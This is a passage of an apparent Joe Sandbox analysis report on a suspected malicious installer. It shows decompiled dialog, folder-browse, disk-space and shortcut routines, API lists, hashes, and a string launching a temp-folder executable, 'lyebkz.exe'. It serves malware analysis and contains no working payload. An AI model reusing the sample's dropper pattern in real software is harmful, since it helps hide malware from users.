				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                    0x00405811
                                    0x00405817
                                    0x00405821
                                    0x00405824
                                    0x004059ba
                                    0x004059de
                                    0x004059de
                                    0x004059f1
                                    0x00405a0f
                                    0x00405a11
                                    0x00405a19
                                    0x00405a6f
                                    0x00405a73
                                    0x00000000
                                    0x00000000
                                    0x00405a75
                                    0x00405a7b
                                    0x00000000
                                    0x00000000
                                    0x00405a85
                                    0x00405a8d
                                    0x00405a90
                                    0x00405b92
                                    0x00000000
                                    0x00405b92
                                    0x00405a9f
                                    0x00405aaa
                                    0x00405ab3
                                    0x00405abe
                                    0x00405ac1
                                    0x00405aca
                                    0x00405ad0
                                    0x00405ad3
                                    0x00405ad3
                                    0x00405aeb
                                    0x00405af4
                                    0x00405af7
                                    0x00405afe
                                    0x00405b05
                                    0x00405b0d
                                    0x00405b0d
                                    0x00405b24
                                    0x00405b24
                                    0x00405b2b
                                    0x00405b31
                                    0x00405b3d
                                    0x00405b44
                                    0x00405b4d
                                    0x00405b4f
                                    0x00405b52
                                    0x00405b61
                                    0x00405b64
                                    0x00405b6a
                                    0x00405b6b
                                    0x00405b71
                                    0x00405b72
                                    0x00405b73
                                    0x00405b7b
                                    0x00405b86
                                    0x00405b8c
                                    0x00405b8c
                                    0x00000000
                                    0x00405aeb
                                    0x00405a21
                                    0x00405a51
                                    0x00405a59
                                    0x00405a64
                                    0x00405a64
                                    0x00405a6a
                                    0x00000000
                                    0x00405a6a
                                    0x00405a25
                                    0x00405a2f
                                    0x00000000
                                    0x004059f3
                                    0x004059f9
                                    0x00405a34
                                    0x00000000
                                    0x00405a3d
                                    0x00405a02
                                    0x00405a07
                                    0x00405a0a
                                    0x00000000
                                    0x00405a0a
                                    0x004059f1
                                    0x0040582a
                                    0x0040582e
                                    0x00405836
                                    0x0040583a
                                    0x0040583d
                                    0x00405840
                                    0x00405843
                                    0x00405846
                                    0x00405847
                                    0x00405848
                                    0x00405861
                                    0x00405864
                                    0x0040586e
                                    0x0040587d
                                    0x00405885
                                    0x0040588d
                                    0x00405892
                                    0x00405895
                                    0x004058a1
                                    0x004058aa
                                    0x004058b3
                                    0x004058d5
                                    0x004058db
                                    0x004058ec
                                    0x004058f1
                                    0x004058ff
                                    0x0040590d
                                    0x0040590d
                                    0x00405912
                                    0x00405920
                                    0x00405920
                                    0x00405925
                                    0x00405928
                                    0x0040592d
                                    0x00405939
                                    0x00405942
                                    0x0040594f
                                    0x0040595e
                                    0x00405951
                                    0x00405956
                                    0x00405956
                                    0x0040596a
                                    0x0040596a
                                    0x0040597e
                                    0x00405987
                                    0x00405990
                                    0x004059a0
                                    0x004059ac
                                    0x004059ac
                                    0x00000000

                                    APIs
                                    • GetDlgItem.USER32(?,00000403), ref: 00405867
                                    • GetDlgItem.USER32(?,000003EE), ref: 00405876
                                    • GetClientRect.USER32 ref: 004058B3
                                    • GetSystemMetrics.USER32 ref: 004058BA
                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                    • ShowWindow.USER32(00000000,?), ref: 00405942
                                    • ShowWindow.USER32(?,00000008), ref: 00405956
                                    • GetDlgItem.USER32(?,000003EC), ref: 00405977
                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                    • GetDlgItem.USER32(?,000003F8), ref: 00405885
                                      • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                    • GetDlgItem.USER32(?,000003EC), ref: 004059C9
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
                                    • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                    • ShowWindow.USER32(00000000), ref: 00405A02
                                    • ShowWindow.USER32(?,00000008), ref: 00405A07
                                    • ShowWindow.USER32(00000008), ref: 00405A51
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                    • CreatePopupMenu.USER32 ref: 00405A96
                                    • AppendMenuW.USER32 ref: 00405AAA
                                    • GetWindowRect.USER32(?,?), ref: 00405ACA
                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                    • OpenClipboard.USER32(00000000), ref: 00405B2B
                                    • EmptyClipboard.USER32 ref: 00405B31
                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                    • GlobalLock.KERNEL32 ref: 00405B47
                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                    • SetClipboardData.USER32 ref: 00405B86
                                    • CloseClipboard.USER32 ref: 00405B8C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                    • String ID: H7B${
                                    • API String ID: 590372296-2256286769
                                    • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                    • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                    • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                    • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404AB5 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 78%
                                    			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == 0x435800) {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                    0x00404ab5
                                    0x00404abb
                                    0x00404ac1
                                    0x00404ace
                                    0x00404adc
                                    0x00404adf
                                    0x00404ae7
                                    0x00404aed
                                    0x00404aed
                                    0x00404af9
                                    0x00404afc
                                    0x00404b6a
                                    0x00404b71
                                    0x00404c48
                                    0x00404c4f
                                    0x00404c5e
                                    0x00404c5e
                                    0x00404c62
                                    0x00404c6c
                                    0x00404c79
                                    0x00404c7b
                                    0x00404c7b
                                    0x00404c89
                                    0x00404c90
                                    0x00404c97
                                    0x00404c9a
                                    0x00404cd6
                                    0x00404cd8
                                    0x00404cde
                                    0x00404ce3
                                    0x00404ce7
                                    0x00404ce9
                                    0x00404ce9
                                    0x00404d05
                                    0x00000000
                                    0x00404d07
                                    0x00404d0a
                                    0x00404d18
                                    0x00404d1e
                                    0x00404d1f
                                    0x00404d22
                                    0x00404d25
                                    0x00000000
                                    0x00404d25
                                    0x00404c9c
                                    0x00404c9e
                                    0x00404ca2
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00404ca4
                                    0x00404ca4
                                    0x00404cb1
                                    0x00404cb6
                                    0x00000000
                                    0x00000000
                                    0x00404cba
                                    0x00404cbc
                                    0x00404cbc
                                    0x00404cc5
                                    0x00404cc7
                                    0x00404ccc
                                    0x00404ccf
                                    0x00404cd4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00404cd4
                                    0x00404d31
                                    0x00404d3b
                                    0x00404d3e
                                    0x00404d41
                                    0x00404d48
                                    0x00404d48
                                    0x00404d4a
                                    0x00404d4a
                                    0x00404d4f
                                    0x00404d51
                                    0x00404d59
                                    0x00404d60
                                    0x00404d62
                                    0x00404d6d
                                    0x00404d6d
                                    0x00404d62
                                    0x00404d7d
                                    0x00404d87
                                    0x00404d8f
                                    0x00404daa
                                    0x00404d91
                                    0x00404d9a
                                    0x00404d9a
                                    0x00404d8f
                                    0x00404daf
                                    0x00404db4
                                    0x00404db9
                                    0x00404dc2
                                    0x00404dc2
                                    0x00404dcb
                                    0x00404dcd
                                    0x00404dcd
                                    0x00404dd9
                                    0x00404de1
                                    0x00404deb
                                    0x00404deb
                                    0x00404df0
                                    0x00000000
                                    0x00404df0
                                    0x00404c9a
                                    0x00404c51
                                    0x00404c58
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00404c58
                                    0x00404b77
                                    0x00404b80
                                    0x00404b9a
                                    0x00404b9f
                                    0x00404ba9
                                    0x00404bb0
                                    0x00404bbc
                                    0x00404bbf
                                    0x00404bc2
                                    0x00404bc9
                                    0x00404bd1
                                    0x00404bd4
                                    0x00404bd8
                                    0x00404bdf
                                    0x00404be7
                                    0x00404c41
                                    0x00404be9
                                    0x00404bea
                                    0x00404bf1
                                    0x00404bfb
                                    0x00404c03
                                    0x00404c10
                                    0x00404c24
                                    0x00404c28
                                    0x00404c28
                                    0x00404c24
                                    0x00404c2d
                                    0x00404c3a
                                    0x00404c3a
                                    0x00404be7
                                    0x00000000
                                    0x00404b9f
                                    0x00404b8d
                                    0x00000000
                                    0x00000000
                                    0x00404b93
                                    0x00000000
                                    0x00404afe
                                    0x00404b0b
                                    0x00404b14
                                    0x00404b21
                                    0x00404b21
                                    0x00404b28
                                    0x00404b2e
                                    0x00404b37
                                    0x00404b3a
                                    0x00404b3d
                                    0x00404b45
                                    0x00404b48
                                    0x00404b4b
                                    0x00404b51
                                    0x00404b58
                                    0x00404b5f
                                    0x00404df6
                                    0x00404e08
                                    0x00404b65
                                    0x00404b68
                                    0x00000000
                                    0x00404b68
                                    0x00404b5f

                                    APIs
                                    • GetDlgItem.USER32(?,000003FB), ref: 00404B04
                                    • SetWindowTextW.USER32 ref: 00404B2E
                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                    • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                    • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx,00423748,00000000,?,?), ref: 00404C1C
                                    • lstrcatW.KERNEL32 ref: 00404C28
                                    • SetDlgItemTextW.USER32 ref: 00404C3A
                                      • Part of subcall function 00405CAC: GetDlgItemTextW.USER32 ref: 00405CBF
                                      • Part of subcall function 004068EF: CharNextW.USER32(?), ref: 00406952
                                      • Part of subcall function 004068EF: CharNextW.USER32(?), ref: 00406961
                                      • Part of subcall function 004068EF: CharNextW.USER32(?), ref: 00406966
                                      • Part of subcall function 004068EF: CharPrevW.USER32(?,?), ref: 00406979
                                    • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                    • MulDiv.KERNEL32 ref: 00404D18
                                      • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                      • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                      • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                    • String ID: "C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx$A$H7B
                                    • API String ID: 2624150263-3935621264
                                    • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                    • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                    • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                    • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 67%
                                    			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                    0x004021b3
                                    0x004021bd
                                    0x004021c7
                                    0x004021d1
                                    0x004021dc
                                    0x004021df
                                    0x004021f9
                                    0x004021fc
                                    0x00402202
                                    0x00402205
                                    0x0040220f
                                    0x00402213
                                    0x00402213
                                    0x00402218
                                    0x00402229
                                    0x00402231
                                    0x004022e8
                                    0x004022e8
                                    0x004022ef
                                    0x00402237
                                    0x00402237
                                    0x00402246
                                    0x0040224a
                                    0x0040224d
                                    0x00402253
                                    0x00402261
                                    0x00402264
                                    0x00402266
                                    0x00402271
                                    0x00402271
                                    0x00402276
                                    0x00402278
                                    0x0040227f
                                    0x0040227f
                                    0x00402282
                                    0x0040228b
                                    0x0040228e
                                    0x00402294
                                    0x00402296
                                    0x004022a0
                                    0x004022a0
                                    0x004022a3
                                    0x004022ac
                                    0x004022af
                                    0x004022b8
                                    0x004022be
                                    0x004022c0
                                    0x004022ce
                                    0x004022ce
                                    0x004022d1
                                    0x004022d7
                                    0x004022d7
                                    0x004022da
                                    0x004022e0
                                    0x004022e6
                                    0x004022fb
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004022e6
                                    0x004022f1
                                    0x00402c2d
                                    0x00402c39

                                    APIs
                                    • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?), ref: 00402229
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: CreateInstance
                                    • String ID:
                                    • API String ID: 542301482-0
                                    • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                    • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                    • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                    • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 39%
                                    			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                    0x00402923
                                    0x0040293e
                                    0x00402949
                                    0x0040294a
                                    0x00402a94
                                    0x00402925
